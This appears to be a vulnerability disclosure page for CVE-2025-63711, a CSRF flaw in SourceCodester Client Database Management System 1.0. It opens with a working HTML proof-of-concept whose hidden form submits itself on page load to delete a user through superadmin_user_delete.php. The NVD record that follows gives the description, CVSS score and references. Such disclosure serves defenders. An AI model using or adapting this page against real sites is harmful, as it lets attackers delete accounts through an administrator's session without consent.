CVE-2025-63711

<!-- CSRF PoC for CVE-2025-63711 --> <!-- Auto-submit form to delete user with ID 2 --> <html> <body> <form id="csrfForm" action="http://target.com/superadmin_user_delete.php" method="POST"> <input type="hidden" name="user_id" value="2" /> <input type="submit" value="Submit Request" /> </form> <script> // Auto-submit when page loads document.getElementById('csrfForm').submit(); </script> </body> </html>

{"cve": {"id": "CVE-2025-63711", "sourceIdentifier": "[email protected]", "published": "2025-11-10T15:15:38.057", "lastModified": "2025-11-17T18:16:51.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) vulnerability in the SourceCodester Client Database Management System 1.0 allows an attacker to cause an authenticated administrative user to perform user deletion actions without their consent. The application's user deletion endpoint (e.g., superadmin_user_delete.php) accepts POST requests containing a user_id parameter and does not enforce request origin or anti-CSRF tokens. Because the endpoint lacks proper authentication/authorization checks and CSRF protections, a remote attacker can craft a malicious page that triggers deletion when visited by an authenticated admin, resulting in arbitrary removal of user accounts."}, {"lang": "es", "value": "Una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en el Sistema de Gestión de Base de Datos de Cliente SourceCodester 1.0 permite a un atacante hacer que un usuario administrativo autenticado realice acciones de eliminación de usuarios sin su consentimiento. El endpoint de eliminación de usuarios de la aplicación (por ejemplo, superadmin_user_delete.php) acepta peticiones POST que contienen un parámetro user_id y no aplica el origen de la petición ni tokens anti-CSRF. Debido a que el endpoint carece de comprobaciones adecuadas de autenticación/autorización y protecciones CSRF, un atacante remoto puede crear una página maliciosa que activa la eliminación cuando es visitada por un administrador autenticado, lo que resulta en la eliminación arbitraria de cuentas de usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lerouxyxchire:client_database_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DFE80DE6-C79F-452F-9523-4EC1F9777DA4"}]}]}], "references": [{"url": "https://github.com/floccocam-cpu/CVE-Research-2025/blob/main/CVE-2025-63711/README3.md", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/php/17514/client-database-management-system.html", "source": "[email protected]", "tags": ["Product"]}]}}